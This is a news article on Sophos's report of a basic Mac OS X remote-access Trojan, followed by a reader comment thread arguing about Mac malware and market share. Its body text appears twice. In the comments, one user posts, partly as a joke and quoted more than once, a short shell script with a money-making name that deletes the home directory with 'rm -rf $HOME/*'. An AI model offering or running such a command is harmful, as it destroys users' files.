Security firm details new Trojan written for Apple's Mac OS X
Hackers have written a new "backdoor Trojan" targeted specifically at Apple's Mac OS X operating system that can allow remote operations and password "phishing," as Mac sales and market share continue to grow.
Security researchers at Sophos have taken the appearance of the "Remote Access Trojan" known as "Blackhole RAT" as a sign that hackers are beginning to take notice of Apple's continued success with the Mac platform. The unfinished malware, said to be based on the Windows RAT "darkComet," allows hackers to remotely send commands or attempt to deceive a Mac user. The darkComet source code is freely available online.
One of the potential uses for the BlackHole Trojan, which the security firm has dubbed OSX/MusMinim-A," is the ability to pop up a fake "Administrator Password" window to phish a target. It can also be used to place text files on the desktop, or remotely send a restart, shutdown or sleep command to the Mac.
Using the Trojan, hackers could also run arbitrary shell commands, send URls to the client to open a website, or place a full-screen window with a message that only allows the user to click reboot. MusMinim is said to be "very basic," and the user interface has a mix of English and German.
The full-screen window with reboot button displays default text to the user of the affected system. It states that the Trojan is "under development," and promises "much more functions" when the final product is released.
The lack of viruses and Trojans on the Mac has long been a selling point of Apple hardware. Just last week, it was revealed that Apple has begun inviting security experts to examine its developer preview of Mac OS X 10.7 Lion, the company's forthcoming operating system update due out this summer.
Prominent security researchers including Charlie Miller and Dino Dai Zovi were asked to analyze security countermeasures included in the first beta of Lion. Apple's invitation to researchers marks the first time the company has expanded beyond its core developers to expose its software to community scrutiny.
Last October, a Java-based Trojan targeting Mac OS X spread through social networking sites by baiting users into clicking a link. Though the Trojan gained some attention, it did not affect a large number of Mac users.
Security researchers at Sophos have taken the appearance of the "Remote Access Trojan" known as "Blackhole RAT" as a sign that hackers are beginning to take notice of Apple's continued success with the Mac platform. The unfinished malware, said to be based on the Windows RAT "darkComet," allows hackers to remotely send commands or attempt to deceive a Mac user. The darkComet source code is freely available online.
One of the potential uses for the BlackHole Trojan, which the security firm has dubbed OSX/MusMinim-A," is the ability to pop up a fake "Administrator Password" window to phish a target. It can also be used to place text files on the desktop, or remotely send a restart, shutdown or sleep command to the Mac.
Using the Trojan, hackers could also run arbitrary shell commands, send URls to the client to open a website, or place a full-screen window with a message that only allows the user to click reboot. MusMinim is said to be "very basic," and the user interface has a mix of English and German.
The full-screen window with reboot button displays default text to the user of the affected system. It states that the Trojan is "under development," and promises "much more functions" when the final product is released.
The lack of viruses and Trojans on the Mac has long been a selling point of Apple hardware. Just last week, it was revealed that Apple has begun inviting security experts to examine its developer preview of Mac OS X 10.7 Lion, the company's forthcoming operating system update due out this summer.
Prominent security researchers including Charlie Miller and Dino Dai Zovi were asked to analyze security countermeasures included in the first beta of Lion. Apple's invitation to researchers marks the first time the company has expanded beyond its core developers to expose its software to community scrutiny.
Last October, a Java-based Trojan targeting Mac OS X spread through social networking sites by baiting users into clicking a link. Though the Trojan gained some attention, it did not affect a large number of Mac users.
Comments
All these hackers are secretly backed by large powerful companies.
It's great to have a former secret agent such as yourself as a member of AI to share these secrets with us. Do you also sell tinfoil hats?
I've written a Trojan myself, it's very destructive, cross platform on many Unix systems. It will wipe out all your files, and it would be very trivial to have it mail them to me or post them somewhere on the internet as well, but I didn't feel like modifying it for that yet. As a service to all security researchers I'll post the code here, it's called 'please_run_me_to_make_money.sh'
#!/bin/sh
rm -rf $HOME/*
echo "U R fscked!"
Don't tell anyone I wrote it!
Caveat: Your explanation must pass the Laugh Test.
a sign that hackers are beginning to take notice of Apple's continued success with the Mac platform..
Haven't they been saying this for the last decade? When are these hackers going to get serious?
Haven't they been saying this for the last decade? When are these hackers going to get serious?
AT 5 or 10% market share, it's just not worth it.
Great, wake me up when a real virus for OS X is developed, one that doesn't require me to manually install and run itself first. No operating system will ever be immune to Trojans, unless you lock it down so tight the user cannot install or run _anything_ without some trusted third-party approving it.
I've written a Trojan myself, it's very destructive, cross platform on many Unix systems. It will wipe out all your files, and it would be very trivial to have it mail them to me or post them somewhere on the internet as well, but I didn't feel like modifying it for that yet. As a service to all security researchers I'll post the code here, it's called 'please_run_me_to_make_money.sh'
#!/bin/sh
rm -rf $HOME/*
echo "U R fscked!"
Don't tell anyone I wrote it!
I know a guy who ran this
sudo rm -rf $HME/*
and asked me if he can recover something.
You don't need trojans for morons.
AT 5 or 10% market share, it's just not worth it.
Which is odd because before Mac OS X Apple sold less Macs and had a smaller marketshare and yet still managed to have more viruses written for it.
AT 5 or 10% market share, it's just not worth it.
That's funny, because back when OS 9 was still around there were dozens of successful viruses for it, in fact, it was much worse than on Windows, even though Macs had even smaller market share at that time.
How is 10% of home computers that are...
- Often used by people who are not tech-savvy
- Often chose a Mac specifically because they didn't want to spend a lot of time dicking around to secure their computers and configure all kinds of arcane things in the OS
- Usually owned by people with enough disposable income
- Usually have AppleID's with credit-card information on it set-up on their system
- Run an OS that is supposedly easy to exploit
... not interesting to malware writers?Like someone before me already said: we've been hearing this argument for over a decade and still nothing happened. Millions of Macs running no antivirus or antimalware at all, and still not a single successful virus. It's just like what people say about Linux: 'it has such a small market share it is not interesting'. Well, personally, I think hacking grandma's old Windows XP machine is a lot less interesting than hacking a public Linux webserver. Yet Microsoft ISS is the webserver every hacker targets, even though it has much smaller marketshare than Linux + Apache. How come?
User stupidity is the best way to get these trojans installed from an untrusted source.
That's funny, because back when OS 9 was still around there were dozens of successful viruses for it, in fact, it was much worse than on Windows, even though Macs had even smaller market share at that time.
How is 10% of home computers that are...
- Often used by people who are not tech-savvy
- Often chose a Mac specifically because they didn't want to spend a lot of time dicking around to secure their computers and configure all kinds of arcane things in the OS
- Usually owned by people with enough disposable income
- Usually have AppleID's with credit-card information on it set-up on their system
- Run an OS that is supposedly easy to exploit
... not interesting to malware writers?Like someone before me already said: we've been hearing this argument for over a decade and still nothing happened. Millions of Macs running no antivirus or antimalware at all, and still not a single successful virus. It's just like what people say about Linux: 'it has such a small market share it is not interesting'. Well, personally, I think hacking grandma's old Windows XP machine is a lot less interesting than hacking a public Linux webserver. Yet Microsoft ISS is the webserver every hacker targets, even though it has much smaller marketshare than Linux + Apache. How come?
That is simply not true.
Care to point out what part of that is 'simply not true'?
Edit: I'll help you out, before you waste your time:
Here's 4 quick searches in the McAfee antivirus database:
1) 16-bit Windows (what I was referring to when I said MacOS was 'much worse than Windows at that time'):
http://www.mcafee.com/apps/search/th...=W16&v=malware : 38 threats
2) MacOS (prior to OS X):
http://www.mcafee.com/apps/search/th...acOS&v=malware : 86 threats
3) OS X:
http://www.mcafee.com/apps/search/th...=OSX&v=malware : 51 threats
4) 32-bit Windows (just for laughs):
http://www.mcafee.com/apps/search/th...=W32&v=malware : 1000 threats, but the database clipped the results at 100 pages
AT 5 or 10% market share, it's just not worth it.
The Mac OS X Malware Myth Continues
But morons needs Trojans® and "decrease the world population"* of future morons!
*Apologies to Charles Dickens "A Christmas Carol".
/
/
/
That is simply not true.
It is true. I?m fine with you disagreeing with his statement ? I am sure d-range is, too*? but at least come with a rational and logical argument to defend your point.
But morons needs Trojans® and "decrease the world population"* of future morons!
*Apologies to Charles Dickens "A Christmas Carol".
/
/
/
Apolgies to Charles Darwin ?On the Origin of Species?, too. Our smartest keep protecting the dumbest and weakest, thus weakening the species.
That's funny, because back when OS 9 was still around there were dozens of successful viruses for it, in fact, it was much worse than on Windows, even though Macs had even smaller market share at that time.
How is 10% of home computers that are...
- Often used by people who are not tech-savvy
- Often chose a Mac specifically because they didn't want to spend a lot of time dicking around to secure their computers and configure all kinds of arcane things in the OS
- Usually owned by people with enough disposable income
- Usually have AppleID's with credit-card information on it set-up on their system
- Run an OS that is supposedly easy to exploit
... not interesting to malware writers?Like someone before me already said: we've been hearing this argument for over a decade and still nothing happened. Millions of Macs running no antivirus or antimalware at all, and still not a single successful virus. It's just like what people say about Linux: 'it has such a small market share it is not interesting'. Well, personally, I think hacking grandma's old Windows XP machine is a lot less interesting than hacking a public Linux webserver. Yet Microsoft ISS is the webserver every hacker targets, even though it has much smaller marketshare than Linux + Apache. How come?
It's also worth pointing out that a good portion of Windows machines are in corporations with full-time IT staff. Professionals working to secure the machines. Between that and the fact that most Windows PCs have anti-virus software, the attractiveness of targeting Windows vs Macs is not nearly as big a gap as pure market share would suggest considering that most Macs do not have anti-virus software and are not being adminstered by IT professionals.
AT 5 or 10% market share, it's just not worth it.
Upwards of 50 million units in operations is small potatoes to a hacker then by your statement. What is the break point for interest by hackers then in your estimation - 100 million units in operation? 200 million units?
I think you are simply repeating the tired old meme of "scarity breeding contempt" by citing marketshare percentage instead of addressing real numbers. The real threshold is "difficulty to hack". If you have two platforms, and you desire to hack them, the first swag you take is to see what, if any tools and existing hacks exist in the wild and check to see what the ease threshold is to get that hack delivered. If one platform is easier and has more routes through which to hack - it makes sense to pursue hacking that platform. Once the landscape gets saturated by hackers for a given platform where, as we see now with Windows, the ease of hack gets mitigated by all the jostling for control, that changes the approach and the "ease threshold". For example, you see some hacks now that once resident seek to wipe out any other trojans or virii resident in order to reduce competition and establish dominance.
With saturation making the ease factor reduced on Windows, you have hackers who are looking at the more difficult platform because the threshold on the other has been raised to the point where it reaches an acceptable parity in difficulty.
Please note that nowhere in this scenario is percentage of marketshare mentioned as any kind of driver. When you are dealing with millions of units, percentages are deceiving in this argument and should be disregarded.